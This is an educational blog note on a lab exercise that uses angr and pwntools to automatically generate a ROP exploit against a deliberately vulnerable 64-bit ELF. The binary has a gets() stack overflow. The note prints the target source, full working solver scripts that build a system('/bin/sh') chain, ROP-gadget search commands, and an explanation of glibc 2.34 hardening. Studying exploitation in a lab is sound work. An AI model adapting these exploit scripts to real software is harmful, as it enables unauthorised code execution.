Angr Symbolic Execution Exercise: Auto ROP Generation

Posted: 2025-04-12 14:53:45

Created: 2025-04-10 11:44
Updated: 2025-04-12 13:57
Link: https://scz.617.cn/unix/202504101144.txt

Contents:

    ☆ Target ELF
    ☆ buffer_overflow_64bit_solver.py
    ☆ ROP tools
    ☆ buffer_overflow_64bit_solver_a.py
    ☆ Why buffer_overflow_64bit_bad cannot be used for the demo

☆ Target ELF

See

Automatic Rop Chain Generation - [2022-01-16]
https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/automatic-exploit-generation/automatic-rop-chain-generation

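The author of this challenge already provides a solver; this note only studies the techniques involved and contains no original material.

buffer_overflow.c is the target source, and buffer_overflow_64bit is the precompiled target ELF.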

int pwn_me()
{
    char my_buf[20] = {'\x00'};
    printf("Your buffer is at %p\n", my_buf);
    /*
     * Stack overflow
     */
    gets(my_buf);
    return 0;
}

void does_nothing()
{
    puts("/bin/sh");
    execve(NULL,NULL,NULL);
    system("sleep 1");
}

void main()
{
    puts("pwn_me:");
    pwn_me();
}

$ file -b buffer_overflow_64bit
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ..., not stripped

$ rabin2 -I buffer_overflow_64bit
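canary   false      // no stack canary
injprot  false      // from this, inferred that there is no ASLR
linenum  true       // contains line-number information
lsyms    true       // contains debug symbols
nx       true       // NX enabled, stack is not executable
relocs   true       // contains relocation information
relro    partial    // Relocation Read-Only is partially enabled
sanitize false      // not built with AddressSanitizer or similar
static   false      // dynamically linked
stripped false      // not stripped

(output abridged)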

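The goal of this exercise is to use angr plus pwn (pwntools) to automatically generate a ROP-based exploit.

gets() triggers the stack overflow; the stack is non-executable, so ROP is required.

does_nothing() is deliberately provided for the solver and conveniently supplies everything ROP needs: the key functions and the key string. If you build the target ELF from source, do not enable optimization, otherwise unused code may be discarded. Even so, building the ELF from source is not recommended, for reasons given later.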

☆ buffer_overflow_64bit_solver.py

import sys, os, time, base64, logging
import angr, claripy
import pwn

def generate_standard_rop_chain ( binary ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )
    logging.getLogger( 'pwnlib.rop.rop' ).setLevel( logging.ERROR )

    pwn.context.clear()
    pwn.context.arch \
                    = 'amd64'
    pwn.context.os  = 'linux'
    pwn.context.binary \
                    = binary
    elf             = pwn.ELF( binary )
    rop             = pwn.ROP( elf )

    strings         = [ b"/bin/sh", b"/bin/bash" ]
    functions       = [ "system", "execve" ]
    ret_func        = None
    ret_string      = None
    for function in functions :
        if function in elf.plt :
            ret_func    = elf.plt[function]
            break
        elif function in elf.symbols :
            ret_func    = elf.symbols[function]
            break
    if not ret_func :
        raise RuntimeError( "Cannot find symbol to return to" )

    for string in strings :
        #
        # elf.search() returns an iterator
        #
        str_occurences  = list( elf.search( string ) )
        if str_occurences :
            ret_string  = str_occurences[0]
            break
    if not ret_string :
        raise RuntimeError( "Cannot find string to pass to system or exec" )

    #
    # On 64-bit Linux (amd64), the system function (often implemented in
    # libc) might use movaps instructions which require the stack pointer
    # (rsp) to be 16-byte aligned. Sometimes, the state of the stack just
    # before calling system via ROP leaves it misaligned (e.g., aligned to
    # 8 bytes but not 16). Adding a single ret gadget advances the stack
    # pointer by one word (8 bytes on amd64), potentially fixing this
    # alignment issue.
    #
    # Whether to add this ret should be decided by testing; it is not a
    # universal fix
    #
    rop.raw( rop.ret.address )
    #
    # This usually produces a stack sequence like
    # [pop_rdi_ret][ret_string][ret_func]
    #
    rop.call( ret_func, [ret_string] )
    #
    # 0x0000:         0x40101a ret
    # 0x0008:         0x4012d3 pop rdi; ret
    # 0x0010:         0x40201a [arg0] rdi = 4202522 // 4202522=0x40201a
    # 0x0018:         0x401094
    #
    try :
        print( rop.dump() )
    except Exception as e :
        print( f"Couldn't automatically find a way: {e}", file=sys.stderr )
        sys.exit( -1 )
    return rop, rop.build()

#
# This function is not a general implementation; it only handles "pop|ret" gadgets
#
def do_64bit_rop_with_stepping ( elf, rop, rop_chain, state ) :
    #
    # rop_chain is a list of code addresses, data addresses, or integers
    #
    # rop.gadgets holds all gadgets as a dict keyed by code address
    #
    # print( rop_chain )
    # print( rop.gadgets )

    curr_rop    = None
    elf_symbol_addrs \
                = [y for x, y in elf.symbols.items()]

    for i, gadget in enumerate( rop_chain ) :
        #
        # We generally have two constraining modes
        #
        # 1. running a code gadget
        # 2. setting a register to an expected popped value
        #

        #
        # gadget may not be a code address; it can also be a data address
        # or an integer
        #
        if gadget in rop.gadgets :
            curr_rop    = rop.gadgets[gadget]
            #
            # reversing it lets us pop values out easy
            #
            # list.pop() removes from the tail and pop(0) from the head,
            # but pop(0) is slow, especially on large lists, so it is
            # avoided here by calling reverse() first
            #
            curr_rop.regs.reverse()
        #
        # Case 1: running a code gadget
        #
        # We keep track of the number of registers our gadget popped, and
        # if it's 0, then we're just executing
        #
        if curr_rop is None or gadget in rop.gadgets or len( curr_rop.regs ) == 0 :
            desire  = state.regs.pc == gadget
            if state.satisfiable( extra_constraints=( desire, ) ) :
                #
                # This process is slower than just setting the whole stack
                # to the chain, but in testing it seems to work more
                # reliably
                #
                print( "Setting PC to {}".format( hex( gadget ) ) )
                state.add_constraints( desire )

                #
                # Since we're emulating the program's execution with angr
                # we will run into an issue when executing any symbols.
                # Where a SimProcedure will get executed instead of the
                # real function, which then gives us the wrong constraints
                # /execution for our rop_chain
                #
                if gadget in elf_symbol_addrs :
                    item            = [x for x in elf.symbols.items() if gadget == x[1]][0]
                    state.regs.pc   = state.project.loader.find_symbol( item[0] ).rebased_addr
                    print( f"Gadget '{item[0]}' is hooked symbol, constraining to real address, but calling SimProc" )

                if i == len( rop_chain ) - 1 :
                    break

                sm      = state.project.factory.simulation_manager( state )
                #
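                # opt_level=0 is the key. It tells angr's VEX engine to
                # disable or reduce optimization. By default angr lifts and
                # analyzes a whole basic block of VEX IR at once. For ROP
                # gadgets, which are usually short and end in ret, the
                # default optimization may make the simulation deviate
                # from real CPU execution, or simulate too many
                # instructions in one step. opt_level=0 forces angr to
                # behave closer to single-stepping and to model the
                # gadget's effect more precisely.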
                #
                sm.explore( opt_level=0 )
                if sm.unconstrained :
                    state   = sm.unconstrained[0]
                else :
                    print( "sm.unconstrained[] is empty", file=sys.stderr )
                    sys.exit( -1 )
            else :
                print( "Unsatisfied setting PC to {}".format( hex( gadget ) ), file=sys.stderr )
                sys.exit( -1 )
        #
        # Case 2: setting a register to an expected popped value
        #
        else :
            #
            # pop() removes from the tail; since the list was reversed
            # earlier, this pop() yields the first register in instruction
            # order
            #
            next_reg    = curr_rop.regs.pop()
            if type( next_reg ) is not str :
                print( "type( next_reg ) is not str", file=sys.stderr )
                sys.exit( -1 )
            print( "Setting register {}".format( next_reg ) )

            gadget_msg  = gadget
            if isinstance( gadget, int ) :
                gadget_msg = hex( gadget )

            state_reg   = getattr( state.regs, next_reg )
            desire      = state_reg == gadget
            if state_reg.symbolic and state.satisfiable( extra_constraints=( desire, ) ):
                print( "Setting register {} to {}".format( next_reg, gadget_msg ) )
                state.add_constraints( desire )
            else:
                print( "Unsatisfied on setting {} to {}".format( next_reg, gadget_msg ), file=sys.stderr )
                sys.exit( -1 )

            if len( curr_rop.regs ) == 0 :
                curr_rop    = None

    return state

def get_input ( state ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )

    copy_state  = state.copy()
    binary      = state.project.filename
    elf         = pwn.ELF( binary )
    rop, rop_chain \
                = generate_standard_rop_chain( binary )
    new_state   = do_64bit_rop_with_stepping(
        elf, rop, rop_chain, copy_state
    )
    input       = new_state.posix.dumps( sys.stdin.fileno() )
    return input

def check_mem_corruption ( sm ) :
    if len( sm.unconstrained ) :
        for u in sm.unconstrained :
            desire  = u.regs.pc == 0x41414141
            if u.satisfiable( extra_constraints=( desire, ) ) :
                sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) )
                # print( sth )
                print( "RetAddr offset is {}".format( sth.index( b"AAAA" ) ) )
                u.globals["input"] \
                    = get_input( u )
                sm.stashes['found'].append( u )
                sm.stashes['unconstrained'].remove( u )
                sm.drop( stash='active' )
                break
    return sm

def main ( argv ) :

    logging.getLogger( 'angr.engines.successors' ).setLevel( logging.ERROR )
    logging.getLogger( 'angr.procedures.libc.gets' ).setLevel( logging.ERROR )

    proj        = angr.Project( argv[1], auto_load_libs=False )
    magic_size  = 128
    magic       = claripy.BVS( "magic", magic_size * 8 )
    init_state  = proj.factory.full_init_state(
        stdin       = angr.SimFileStream(
            name    = 'stdin',
            content = magic,
            has_end = True
        ),
    )
    #
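    # Sets the limit on how many bytes of the standard input/output buffers
    # are symbolic in angr's simulated libc. For performance reasons angr
    # may not keep an entire stream symbolic. This option tells angr how
    # many leading bytes of stdin/stdout/stderr to treat as symbolic at
    # most. If the program reads more than that, angr may concretize the
    # rest or apply some other strategy. A sufficiently large value helps
    # ensure that the symbolic input magic can reach past the buffer being
    # overflowed.
    #
    # This example is a special case: testing shows it also works without
    # this setting, but setting it is still recommended
    #
    # The default is 60
    #
    init_state.libc.buf_symbolic_bytes \
                = magic_size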
    sm          = proj.factory.simulation_manager(
        init_state,
        save_unconstrained  = True,
        stashes             = {
            'active'        : [init_state],
            'unconstrained' : [],
            'found'         : [],
        }
    )
    sm.explore( step_func=check_mem_corruption )
    if not sm.found :
        return
    raw         = sm.found[0].globals["input"]
    somefile    = '/tmp/some.bin'
    with open( somefile, "wb" ) as f :
        f.write( raw )
    print( "cat {} - | ./{}".format( somefile, argv[1] ) )
    solution    = base64.b64encode( raw ).decode( 'utf-8' )
    print( '(echo -ne "%s" | base64 -d;cat -) | ./%s' % ( solution, argv[1] ) )

if "__main__" == __name__ :
    start   = time.time()
    main( sys.argv )
    end     = time.time()
    print( "Time elapsed: {}".format( end - start ) )

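The overall approach is as follows. check_mem_corruption() finds a state in which RetAddr is controllable. get_input() obtains the input used for the stack overflow. generate_standard_rop_chain() obtains the rop chain; this step has nothing to do with angr and depends only on the pwn module. In a sense, "Auto ROP Generation" is a gimmick that misleads readers into thinking angr found the rop chain. do_64bit_rop_with_stepping() does the constraint solving that ensures the rop chain actually gets executed.

rop.gadgets[addr].regs[] is a list whose elements may be the names of the registers the gadget modifies, or may be integers. Consider rop.gadgets: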
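The slot-by-slot decision made in do_64bit_rop_with_stepping() can be illustrated without angr or pwntools. The sketch below is only a model of that decision: FakeGadget and plan_chain are hypothetical names, not part of either library, and the addresses are the ones shown in the rop.dump() comment of the listing. Unlike the original, which reverses the gadget's regs list in place, it copies the register names into a deque.

```python
from collections import deque, namedtuple

# Hypothetical stand-in for a pwntools gadget: only the fields used here.
FakeGadget = namedtuple("FakeGadget", ["address", "insns", "regs"])

def plan_chain(rop_chain, gadgets):
    """Label each chain slot as a PC target or as a value popped into a register."""
    plan = []
    pending = deque()     # registers the current gadget still has to pop
    for item in rop_chain:
        if item in gadgets or not pending:
            # Code address: a known gadget or a plain function address
            plan.append(("pc", item))
            regs = gadgets[item].regs if item in gadgets else []
            # Keep register names only; the gadget table itself is not mutated
            pending = deque(r for r in regs if isinstance(r, str))
        else:
            # Data slot: consumed by the next pending pop, in instruction order
            plan.append(("reg", pending.popleft(), item))
    return plan

gadgets = {
    0x40101a: FakeGadget(0x40101a, ["ret"], []),
    0x4012d3: FakeGadget(0x4012d3, ["pop rdi", "ret"], ["rdi"]),
}
chain = [0x40101a, 0x4012d3, 0x40201a, 0x401094]
for step in plan_chain(chain, gadgets):
    print(step)
```

Each "pc" entry corresponds to a constraint on state.regs.pc followed by a step, and each "reg" entry to a constraint on the named register. As in the original, a data value that happens to equal a gadget address would be treated as code.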

4198423: Gadget(0x401017, ['add esp, 8', 'ret'], [8], 0x10),
4198422: Gadget(0x401016, ['add rsp, 8', 'ret'], [8], 0x10),
4198919: Gadget(0x401207, ['leave', 'ret'], ['rbp', 'rsp'], 0x2540be407),
4199116: Gadget(0x4012cc, ['pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['r12', 'r13', 'r14', 'r15'], 0x28),
4199118: Gadget(0x4012ce, ['pop r13', 'pop r14', 'pop r15', 'ret'], ['r13', 'r14', 'r15'], 0x20),
4199120: Gadget(0x4012d0, ['pop r14', 'pop r15', 'ret'], ['r14', 'r15'], 0x18),
4199122: Gadget(0x4012d2, ['pop r15', 'ret'], ['r15'], 0x10),
4199115: Gadget(0x4012cb, ['pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r12', 'r13', 'r14', 'r15'], 0x30),
4199119: Gadget(0x4012cf, ['pop rbp', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r14', 'r15'], 0x20),
4198813: Gadget(0x40119d, ['pop rbp', 'ret'], ['rbp'], 0x10),
4199123: Gadget(0x4012d3, ['pop rdi', 'ret'], ['rdi'], 0x10),
4199121: Gadget(0x4012d1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0x18),
4199117: Gadget(0x4012cd, ['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rsp', 'r13', 'r14', 'r15'], 0x28),
4198426: Gadget(0x40101a, ['ret'], [], 0x8)

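The third column of Gadget() (counting from 1) is regs[]. Most of the time it is a series of register names, sometimes it looks like [8], and sometimes it is []. The meaning of regs[] is easy to work out, and code that handles regs[] must account for all of these cases.

☆ ROP tools

See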
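A small sketch of how the different regs[] shapes could be told apart before walking a chain. Both helper names are hypothetical, and the sample rows are copied from the listing above; treating a non-string entry such as 8 as "not a register to constrain" is an assumption based on that listing, not on pwntools documentation.

```python
def is_pop_ret(insns):
    """True if every instruction but the last is a pop and the last one is ret."""
    return bool(insns) and insns[-1] == "ret" and all(
        i.startswith("pop ") for i in insns[:-1]
    )

def split_regs(regs):
    """Separate register names from any other entries (for example the integer 8)."""
    names = [r for r in regs if isinstance(r, str)]
    others = [r for r in regs if not isinstance(r, str)]
    return names, others

# (instructions, regs) pairs taken from the rop.gadgets listing
samples = [
    (["add rsp, 8", "ret"], [8]),
    (["leave", "ret"], ["rbp", "rsp"]),
    (["pop rsi", "pop r15", "ret"], ["rsi", "r15"]),
    (["ret"], []),
]
for insns, regs in samples:
    print(insns, is_pop_ret(insns), split_regs(regs))
```

Only gadgets for which is_pop_ret() holds fit the "pop|ret" restriction stated for do_64bit_rop_with_stepping(); the others would need separate handling.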

https://docs.pwntools.com/en/stable/rop/rop.html

ROPgadget Tool
https://github.com/JonathanSalwan/ROPgadget

Ropper
https://github.com/sashs/Ropper

python3 ROPgadget.py --help
python3 ROPgadget.py --binary buffer_overflow_64bit --only "pop|ret"
python3 ROPgadget.py --binary buffer_overflow_64bit --ropchain

python3 Ropper.py -h
python3 Ropper.py -f buffer_overflow_64bit --search "pop rdi"
python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret"
python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret" --detail

With --detail, each line shows one instruction; otherwise all instructions are shown on one line, separated by semicolons.

python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]"
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax"
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3 --detail

A quality of 1 is the best but may yield no result; 10 is the worst and may yield many results.

☆ buffer_overflow_64bit_solver_a.py

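The rop chain can be placed directly on the stack, which is simpler. The original comments say that emulating the rop chain with angr is more reliable, which is why the complex do_64bit_rop_with_stepping() is used; for this example alone it is unnecessary. The version below modifies two functions and removes do_64bit_rop_with_stepping().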

def get_input ( state, prefix ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )

    binary      = state.project.filename
    elf         = pwn.ELF( binary )
    rop, rop_chain \
                = generate_standard_rop_chain( binary )
    input       = prefix
    #
    # Place the rop chain directly on the stack
    #
    for item in rop_chain :
        if not isinstance( item, int ) :
            raise TypeError( f"ROP chain item is not an integer: {item} ({type(item)})" )
        #
        # Pack the 64-bit integer into 8 bytes, little-endian
        #
        item    = item.to_bytes( 8, byteorder='little', signed=False )
        input  += item
    return input

def check_mem_corruption ( sm ) :
    if len( sm.unconstrained ) :
        for u in sm.unconstrained :
            desire  = u.regs.pc == 0x41414141
            if u.satisfiable( extra_constraints=( desire, ) ) :
                sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) )
                off = sth.index( b"AAAA" )
                print( "RetAddr offset is {}".format( off ) )
                sth = sth[0:off]
                u.globals["input"] \
                    = get_input( u, sth )
                sm.stashes['found'].append( u )
                sm.stashes['unconstrained'].remove( u )
                sm.drop( stash='active' )
                break
    return sm
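The same payload construction can be tried standalone, without angr or pwntools. This is a sketch under assumptions: build_payload is a hypothetical helper, the stdin dump is a hand-made stand-in for u.posix.dumps(), the offset 40 matches the "RetAddr offset is 40" line the solver prints, and the chain values are the ones from the rop.dump() comment in the first listing. The newline check is an addition, since gets() stops reading at the first newline.

```python
import struct

def build_payload(stdin_dump, rop_chain, marker=b"AAAA"):
    """Keep the bytes before the marker, then append the chain as 64-bit LE words."""
    off = stdin_dump.index(marker)        # offset of the saved return address
    payload = stdin_dump[:off] + b"".join(struct.pack("<Q", x) for x in rop_chain)
    if b"\n" in payload:
        # gets() stops at the first newline, so such a payload would be cut short
        raise ValueError("payload contains a newline byte")
    return payload

# Stand-in for the solved stdin: 40 filler bytes, then pc == 0x41414141
dump = b"\x00" * 40 + struct.pack("<Q", 0x41414141) + b"\x00" * 80
chain = [0x40101a, 0x4012d3, 0x40201a, 0x401094]
payload = build_payload(dump, chain)
print(len(payload), payload[40:48].hex())   # 72 1a10400000000000
```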

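☆ Why buffer_overflow_64bit_bad cannot be used for the demo

Build buffer_overflow_64bit_bad from source:

gcc-11 -fno-stack-protector \
-Wno-implicit-function-declaration -Wno-format-security \
-no-pie -z relro buffer_overflow.c -o buffer_overflow_64bit_bad

When looking for a rop chain in buffer_overflow_64bit, we need "pop rdi; ret". It is indeed found at 0x4012d3, inside __libc_csu_init(). The original instruction there is "pop r15", but when execution starts in the middle of it, the remaining bytes decode as "pop rdi".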

gdb -q -nx --args ./buffer_overflow_64bit anything

starti

(gdb) x/2i 0x4012d3
   0x4012d3 <__libc_csu_init+99>:       pop    %rdi
   0x4012d4 <__libc_csu_init+100>:      ret
(gdb) x/2bx 0x4012d3
0x4012d3 <__libc_csu_init+99>:  0x5f    0xc3

/*
 * buffer_overflow_64bit
 */
00000000004010D0                         _start
...
00000000004010E3 49 C7 C0 E0 12 40 00        mov     r8, offset __libc_csu_fini  ; fini
00000000004010EA 48 C7 C1 70 12 40 00        mov     rcx, offset __libc_csu_init ; init
00000000004010F1 48 C7 C7 45 12 40 00        mov     rdi, offset main            ; main
00000000004010F8 FF 15 F2 2E 00 00           call    cs:__libc_start_main_ptr
00000000004010FE F4                          hlt

0000000000401270                         __libc_csu_init
...
/*
 * rop chain
 */
00000000004012D2 41 5F                       pop     r15
00000000004012D4 C3                          retn
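The overlap between "pop r15" (41 5F) and "pop rdi" (5F) can be checked with a plain byte search. The helper name find_gadget_bytes is hypothetical; the three bytes and the base address 0x4012d2 are taken from the disassembly above. This is only a raw pattern match, not what ROPgadget or Ropper do internally.

```python
def find_gadget_bytes(code, pattern, base=0):
    """Return every address at which pattern occurs in code, including overlaps."""
    hits = []
    start = 0
    while True:
        idx = code.find(pattern, start)
        if idx < 0:
            return hits
        hits.append(base + idx)
        start = idx + 1

# Bytes at 0x4012d2: 41 5F = pop r15, C3 = ret
code = bytes.fromhex("415fc3")
# 5F C3 = pop rdi; ret, found one byte into the pop r15 encoding
print([hex(a) for a in find_gadget_bytes(code, b"\x5f\xc3", base=0x4012d2)])
# ['0x4012d3']
```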

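But buffer_overflow_64bit_bad, compiled with gcc 11.3.0, contains no "pop rdi; ret". The reason is that in the bad version fini and init are initialized to NULL, and the ELF contains no code for __libc_csu_init(). As it happens, only __libc_csu_init() contains "pop rdi; ret"; no other rop chain achieving the same goal was found, and several ROP tools all failed to find an alternative.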

/*
 * buffer_overflow_64bit_bad
 */
00000000004010D0                         _start
...
/*
 * initialized to NULL
 */
00000000004010E3 45 31 C0                    xor     r8d, r8d                    ; fini
00000000004010E6 31 C9                       xor     ecx, ecx                    ; init
00000000004010E8 48 C7 C7 4E 12 40 00        mov     rdi, offset main            ; main
00000000004010EF FF 15 FB 2E 00 00           call    cs:__libc_start_main_ptr
00000000004010F5 F4                          hlt

$ python3 buffer_overflow_64bit_solver.py buffer_overflow_64bit_bad
RetAddr offset is 40
[ERROR] Could not satisfy setRegisters({'rdi': 4202522})
ERROR    | 2025-04-09 22:23:10,945 | pwnlib.rop.rop | Could not satisfy setRegisters({'rdi': 4202522})
Couldn't automatically find a way: Could not satisfy setRegisters({'rdi': 4202522})

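For now I do not know how to adjust the gcc options so that init is initialized to __libc_csu_init.

Xiao Hou, on reading this far, pointed out that the issue has nothing to do with the gcc version and is related to the glibc version: it results from a security hardening introduced in 2.34 that specifically targets the ret2csu technique.

The following commands show the current glibc version; the first is not reliable, and the last two are recommended.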

ldd --version
/lib/x86_64-linux-gnu/libc.so.6
$(ldd /bin/ls | cut -d' ' -f3 | grep libc.so.)

The test environment for this note uses glibc 2.35.
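The version threshold can also be expressed as a small check. This is a sketch under the assumption, taken from this note, that __libc_csu_init() is present only when the binary is built against glibc older than 2.34; expects_libc_csu_init is a hypothetical helper name. platform.libc_ver() reports the libc of the running Python interpreter, which matches the build host only if the target is compiled on the same machine.

```python
import platform

def expects_libc_csu_init(glibc_version):
    """True if a build against this glibc version should still contain __libc_csu_init()."""
    major, minor = (int(part) for part in glibc_version.split(".")[:2])
    return (major, minor) < (2, 34)

lib, ver = platform.libc_ver()
if lib == "glibc" and ver:
    print(ver, expects_libc_csu_init(ver))
else:
    print("glibc version not detected")
```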

See

https://github.com/bminor/glibc/commit/035c012e32c11e84d64905efaf55e74f704d3668

Before 2.34 there was "csu/elf-init.c", which contained __libc_csu_init(), the function that calls init_array[]. 2.34 removed elf-init.c and with it __libc_csu_init() and related functions.

In 2.34, "csu/libc-start.c" has call_init(), which calls init_array[].

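__libc_csu_init() lives in the ELF that contains main(), whereas call_init() is no longer part of that ELF: for dynamically linked programs, csu/libc-start.c is built into libc.so.6 alongside __libc_start_main(), a shared object rather than the fixed-address main executable. ASLR affects the latter more.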

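CTF players probably recognize this at a glance; I have never played CTF and am not familiar with these subtle changes.

Originally published on the WeChat official account 青衣十三楼飞花堂: Angr Symbolic Execution Exercise: Auto ROP Generation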
